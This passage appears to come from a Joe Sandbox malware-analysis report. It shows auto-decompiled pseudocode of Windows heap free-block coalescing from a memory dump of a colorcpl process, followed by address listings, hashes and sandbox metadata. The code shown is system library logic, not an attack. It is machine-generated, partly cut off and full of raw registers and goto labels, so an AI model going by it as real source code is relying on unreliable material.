				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E06ECFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E06EDA80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E06E6D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E06E1B150();
										} else {
											E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E06E1B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x6f06378 = 1;
											asm("int3");
											 *0x6f06378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E06E3A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E06E3A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E06E3BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E06EDA80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E06E3A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E06E3A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E06E6D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E06E1B150();
								} else {
									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E06E1B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x6f06378 = 1;
									asm("int3");
									 *0x6f06378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E06ECFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E06EDA80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E06E6D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E06E1B150();
													} else {
														E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E06E1B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x6f06378 = 1;
														asm("int3");
														 *0x6f06378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E06E3A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E06E3A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E06E3BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E06EDA80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E06E6D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E06E1B150();
													} else {
														E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E06E1B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x6f06378 = 1;
														asm("int3");
														 *0x6f06378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E06E3A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E06E3A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E06E3BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E06E3BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                                                                0x06e399ca
                                                                                                0x06e399cc
                                                                                                0x06e399df
                                                                                                0x06e399e3
                                                                                                0x06e399f8
                                                                                                0x06e399fb
                                                                                                0x06e399fb
                                                                                                0x00000000
                                                                                                0x06e39a48
                                                                                                0x06e39a48
                                                                                                0x06e39a4c
                                                                                                0x06e39a51
                                                                                                0x06e39a55
                                                                                                0x06e39a61
                                                                                                0x06e39a66
                                                                                                0x06e39a68
                                                                                                0x06e81457
                                                                                                0x06e8145c
                                                                                                0x06e8145c
                                                                                                0x06e39a68
                                                                                                0x06e39a6e
                                                                                                0x06e39a71
                                                                                                0x06e39a74
                                                                                                0x06e39a76
                                                                                                0x06e81466
                                                                                                0x06e81469
                                                                                                0x06e81469
                                                                                                0x06e8146c
                                                                                                0x06e8146e
                                                                                                0x06e81471
                                                                                                0x06e81474
                                                                                                0x06e81477
                                                                                                0x06e81479
                                                                                                0x06e8159c
                                                                                                0x06e8159c
                                                                                                0x06e8159d
                                                                                                0x06e815a6
                                                                                                0x06e815ab
                                                                                                0x06e815ab
                                                                                                0x00000000
                                                                                                0x06e815ab
                                                                                                0x06e8147f
                                                                                                0x06e81481
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8148a
                                                                                                0x06e8148d
                                                                                                0x06e81493
                                                                                                0x06e81495
                                                                                                0x06e814c0
                                                                                                0x06e814c0
                                                                                                0x06e814c3
                                                                                                0x06e814c6
                                                                                                0x06e814c8
                                                                                                0x06e814cb
                                                                                                0x06e814cf
                                                                                                0x06e814f2
                                                                                                0x06e814f2
                                                                                                0x06e814f5
                                                                                                0x06e814f8
                                                                                                0x06e81501
                                                                                                0x06e81508
                                                                                                0x06e8150b
                                                                                                0x06e8150e
                                                                                                0x06e81510
                                                                                                0x06e81513
                                                                                                0x06e81515
                                                                                                0x06e81515
                                                                                                0x06e81518
                                                                                                0x06e81518
                                                                                                0x06e81513
                                                                                                0x06e81521
                                                                                                0x06e81525
                                                                                                0x06e8152a
                                                                                                0x06e8152d
                                                                                                0x06e81530
                                                                                                0x06e81532
                                                                                                0x06e81539
                                                                                                0x06e8153d
                                                                                                0x06e8155d
                                                                                                0x06e81562
                                                                                                0x06e8153f
                                                                                                0x06e81555
                                                                                                0x06e8155a
                                                                                                0x06e81570
                                                                                                0x06e81577
                                                                                                0x06e8157c
                                                                                                0x06e81582
                                                                                                0x06e81585
                                                                                                0x06e81589
                                                                                                0x06e8158b
                                                                                                0x06e81592
                                                                                                0x06e81593
                                                                                                0x06e81593
                                                                                                0x06e81589
                                                                                                0x06e81530
                                                                                                0x00000000
                                                                                                0x06e814f8
                                                                                                0x06e814d5
                                                                                                0x06e814da
                                                                                                0x06e814dc
                                                                                                0x00000000
                                                                                                0x06e814de
                                                                                                0x06e814e8
                                                                                                0x00000000
                                                                                                0x06e814e8
                                                                                                0x06e81497
                                                                                                0x06e81497
                                                                                                0x06e814a4
                                                                                                0x06e814a4
                                                                                                0x06e814a7
                                                                                                0x06e814a9
                                                                                                0x06e814ab
                                                                                                0x06e814ab
                                                                                                0x06e8149c
                                                                                                0x06e8149e
                                                                                                0x06e814a0
                                                                                                0x06e814b0
                                                                                                0x06e814b0
                                                                                                0x00000000
                                                                                                0x06e814a2
                                                                                                0x06e814a2
                                                                                                0x00000000
                                                                                                0x06e814a2
                                                                                                0x06e814a0
                                                                                                0x06e814b3
                                                                                                0x06e814bb
                                                                                                0x00000000
                                                                                                0x06e814bb
                                                                                                0x06e81495
                                                                                                0x06e39a7c
                                                                                                0x06e39a7c
                                                                                                0x06e39a7f
                                                                                                0x06e39a7f
                                                                                                0x06e39a82
                                                                                                0x06e39a84
                                                                                                0x06e39a87
                                                                                                0x06e39a8a
                                                                                                0x06e39a8d
                                                                                                0x06e39a8f
                                                                                                0x06e8166a
                                                                                                0x06e8166a
                                                                                                0x06e8166b
                                                                                                0x06e81674
                                                                                                0x00000000
                                                                                                0x06e81674
                                                                                                0x06e39a95
                                                                                                0x06e39a97
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e39aa0
                                                                                                0x06e39aa3
                                                                                                0x06e39aa9
                                                                                                0x06e39aab
                                                                                                0x06e39ad7
                                                                                                0x06e39ad7
                                                                                                0x06e39ada
                                                                                                0x06e39add
                                                                                                0x06e39adf
                                                                                                0x06e39ae2
                                                                                                0x06e39ae6
                                                                                                0x06e39b22
                                                                                                0x06e39b27
                                                                                                0x06e39b29
                                                                                                0x00000000
                                                                                                0x06e39b2b
                                                                                                0x06e815be
                                                                                                0x00000000
                                                                                                0x06e815be
                                                                                                0x06e39b29
                                                                                                0x06e39ae8
                                                                                                0x06e39ae8
                                                                                                0x06e39aeb
                                                                                                0x06e39aee
                                                                                                0x06e815cb
                                                                                                0x06e815d2
                                                                                                0x06e815d5
                                                                                                0x06e815d7
                                                                                                0x06e815da
                                                                                                0x06e815dc
                                                                                                0x06e815dc
                                                                                                0x06e815dc
                                                                                                0x06e815da
                                                                                                0x06e815e5
                                                                                                0x06e815e9
                                                                                                0x06e815ee
                                                                                                0x06e815f1
                                                                                                0x06e815f3
                                                                                                0x06e815f9
                                                                                                0x06e81600
                                                                                                0x06e81604
                                                                                                0x06e81624
                                                                                                0x06e81629
                                                                                                0x06e81606
                                                                                                0x06e8161c
                                                                                                0x06e81621
                                                                                                0x06e81637
                                                                                                0x06e8163e
                                                                                                0x06e81643
                                                                                                0x06e81649
                                                                                                0x06e8164c
                                                                                                0x06e81650
                                                                                                0x06e81656
                                                                                                0x06e8165d
                                                                                                0x06e8165e
                                                                                                0x06e8165e
                                                                                                0x06e81650
                                                                                                0x06e815f3
                                                                                                0x06e39af4
                                                                                                0x06e39af7
                                                                                                0x06e39afc
                                                                                                0x06e39b00
                                                                                                0x06e39b04
                                                                                                0x06e39b08
                                                                                                0x06e39b14
                                                                                                0x06e399fe
                                                                                                0x06e39a04
                                                                                                0x06e39a07
                                                                                                0x00000000
                                                                                                0x06e39a29
                                                                                                0x06e8169c
                                                                                                0x06e816a0
                                                                                                0x06e816a5
                                                                                                0x06e816a9
                                                                                                0x06e816b5
                                                                                                0x06e816ba
                                                                                                0x06e816bc
                                                                                                0x06e816be
                                                                                                0x06e816c3
                                                                                                0x06e816c3
                                                                                                0x06e816bc
                                                                                                0x06e816c8
                                                                                                0x06e816cc
                                                                                                0x06e8181b
                                                                                                0x06e8181b
                                                                                                0x06e8181e
                                                                                                0x06e8181e
                                                                                                0x06e81821
                                                                                                0x06e81823
                                                                                                0x06e81826
                                                                                                0x06e81829
                                                                                                0x06e8182c
                                                                                                0x06e8182e
                                                                                                0x06e81688
                                                                                                0x06e81688
                                                                                                0x06e81689
                                                                                                0x06e8168b
                                                                                                0x06e8168c
                                                                                                0x06e8168d
                                                                                                0x06e8168f
                                                                                                0x06e81692
                                                                                                0x00000000
                                                                                                0x06e81692
                                                                                                0x06e81834
                                                                                                0x06e81836
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8183f
                                                                                                0x06e81842
                                                                                                0x06e81848
                                                                                                0x06e8184a
                                                                                                0x06e81875
                                                                                                0x06e81875
                                                                                                0x06e81878
                                                                                                0x06e8187b
                                                                                                0x06e8187d
                                                                                                0x06e81880
                                                                                                0x06e81884
                                                                                                0x06e818a7
                                                                                                0x06e818a7
                                                                                                0x06e818aa
                                                                                                0x06e818ad
                                                                                                0x06e818b6
                                                                                                0x06e818bd
                                                                                                0x06e818c0
                                                                                                0x06e818c3
                                                                                                0x06e818c5
                                                                                                0x06e818c8
                                                                                                0x06e818ca
                                                                                                0x06e818ca
                                                                                                0x06e818cd
                                                                                                0x06e818cd
                                                                                                0x06e818c8
                                                                                                0x06e818d5
                                                                                                0x06e818da
                                                                                                0x06e818df
                                                                                                0x06e818e2
                                                                                                0x06e818e5
                                                                                                0x06e818e7
                                                                                                0x06e818ee
                                                                                                0x06e818f2
                                                                                                0x06e81912
                                                                                                0x06e81917
                                                                                                0x06e818f4
                                                                                                0x06e8190a
                                                                                                0x06e8190f
                                                                                                0x06e81925
                                                                                                0x06e8192c
                                                                                                0x06e81931
                                                                                                0x06e8193a
                                                                                                0x06e8193e
                                                                                                0x06e81940
                                                                                                0x06e81947
                                                                                                0x06e81948
                                                                                                0x06e81948
                                                                                                0x06e8193e
                                                                                                0x06e818e5
                                                                                                0x06e8194f
                                                                                                0x06e81952
                                                                                                0x06e81956
                                                                                                0x06e8195d
                                                                                                0x06e81961
                                                                                                0x06e8196d
                                                                                                0x00000000
                                                                                                0x06e8196d
                                                                                                0x06e8188a
                                                                                                0x06e8188f
                                                                                                0x06e81891
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8189d
                                                                                                0x00000000
                                                                                                0x06e8189d
                                                                                                0x06e8184c
                                                                                                0x06e81859
                                                                                                0x06e81859
                                                                                                0x06e8185c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e81851
                                                                                                0x06e81853
                                                                                                0x06e81855
                                                                                                0x06e81865
                                                                                                0x06e81865
                                                                                                0x06e81866
                                                                                                0x06e81868
                                                                                                0x06e81870
                                                                                                0x00000000
                                                                                                0x06e81870
                                                                                                0x06e81857
                                                                                                0x06e81857
                                                                                                0x06e8185e
                                                                                                0x00000000
                                                                                                0x06e816d2
                                                                                                0x06e816d2
                                                                                                0x06e816d5
                                                                                                0x06e816d5
                                                                                                0x06e816d8
                                                                                                0x06e816da
                                                                                                0x06e816dd
                                                                                                0x06e816e0
                                                                                                0x06e816e3
                                                                                                0x06e816e5
                                                                                                0x06e81808
                                                                                                0x06e81808
                                                                                                0x06e81809
                                                                                                0x06e81812
                                                                                                0x06e81817
                                                                                                0x06e81817
                                                                                                0x00000000
                                                                                                0x06e81817
                                                                                                0x06e816eb
                                                                                                0x06e816ed
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e816f6
                                                                                                0x06e816f9
                                                                                                0x06e816ff
                                                                                                0x06e81701
                                                                                                0x06e8172c
                                                                                                0x06e8172c
                                                                                                0x06e8172f
                                                                                                0x06e81732
                                                                                                0x06e81734
                                                                                                0x06e81737
                                                                                                0x06e8173b
                                                                                                0x06e8175e
                                                                                                0x06e8175e
                                                                                                0x06e81761
                                                                                                0x06e81764
                                                                                                0x06e8176d
                                                                                                0x06e81774
                                                                                                0x06e81777
                                                                                                0x06e8177a
                                                                                                0x06e8177c
                                                                                                0x06e8177f
                                                                                                0x06e81781
                                                                                                0x06e81781
                                                                                                0x06e81784
                                                                                                0x06e81784
                                                                                                0x06e8177f
                                                                                                0x06e8178c
                                                                                                0x06e81791
                                                                                                0x06e81796
                                                                                                0x06e81799
                                                                                                0x06e8179c
                                                                                                0x06e8179e
                                                                                                0x06e817a5
                                                                                                0x06e817a9
                                                                                                0x06e817c9
                                                                                                0x06e817ce
                                                                                                0x06e817ab
                                                                                                0x06e817c1
                                                                                                0x06e817c6
                                                                                                0x06e817dc
                                                                                                0x06e817e3
                                                                                                0x06e817e8
                                                                                                0x06e817ee
                                                                                                0x06e817f1
                                                                                                0x06e817f5
                                                                                                0x06e817f7
                                                                                                0x06e817fe
                                                                                                0x06e817ff
                                                                                                0x06e817ff
                                                                                                0x06e817f5
                                                                                                0x06e8179c
                                                                                                0x00000000
                                                                                                0x06e81764
                                                                                                0x06e81741
                                                                                                0x06e81746
                                                                                                0x06e81748
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e81754
                                                                                                0x00000000
                                                                                                0x06e81754
                                                                                                0x06e81703
                                                                                                0x06e81710
                                                                                                0x06e81710
                                                                                                0x06e81713
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e81708
                                                                                                0x06e8170a
                                                                                                0x06e8170c
                                                                                                0x06e8171c
                                                                                                0x06e8171c
                                                                                                0x06e8171d
                                                                                                0x06e8171f
                                                                                                0x06e81727
                                                                                                0x00000000
                                                                                                0x06e81727
                                                                                                0x06e8170e
                                                                                                0x06e8170e
                                                                                                0x06e81715
                                                                                                0x00000000
                                                                                                0x06e81715
                                                                                                0x06e816cc
                                                                                                0x06e39a45
                                                                                                0x06e39a45
                                                                                                0x06e39a0e
                                                                                                0x06e39a1c
                                                                                                0x06e39a23
                                                                                                0x06e8167e
                                                                                                0x06e8167f
                                                                                                0x06e81681
                                                                                                0x06e81683
                                                                                                0x06e81684
                                                                                                0x00000000
                                                                                                0x06e81684
                                                                                                0x00000000
                                                                                                0x06e39aad
                                                                                                0x06e39aad
                                                                                                0x06e39ab0
                                                                                                0x06e39ab3
                                                                                                0x06e39ab3
                                                                                                0x06e39ab6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e39ab8
                                                                                                0x06e39aba
                                                                                                0x06e39abc
                                                                                                0x06e39ac8
                                                                                                0x06e39ac8
                                                                                                0x00000000
                                                                                                0x06e39abe
                                                                                                0x06e39abe
                                                                                                0x06e39ac0
                                                                                                0x00000000
                                                                                                0x06e39ac0
                                                                                                0x06e39abc
                                                                                                0x06e39ad2
                                                                                                0x00000000
                                                                                                0x06e39ad2
                                                                                                0x06e39aab

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                • API String ID: 0-3178619729
                                                                                                • Opcode ID: 7cb35fb51084d1db32b1898d3fc47ecbad90213ce4a13ee043c8df3d03d121e7
                                                                                                • Instruction ID: 70ce33788e426b809251592e15d05c23a029b76f4fb1e66c27ec55a86b4f5676
                                                                                                • Opcode Fuzzy Hash: 7cb35fb51084d1db32b1898d3fc47ecbad90213ce4a13ee043c8df3d03d121e7
                                                                                                • Instruction Fuzzy Hash: 4C221570A003429FE7A4DF28C885BBAB7F5EF45708F149569E49E8B342E771D886CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E3B477 Relevance: 4.2, Strings: 3, Instructions: 405COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 67%
                                                                                                			E06E3B477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
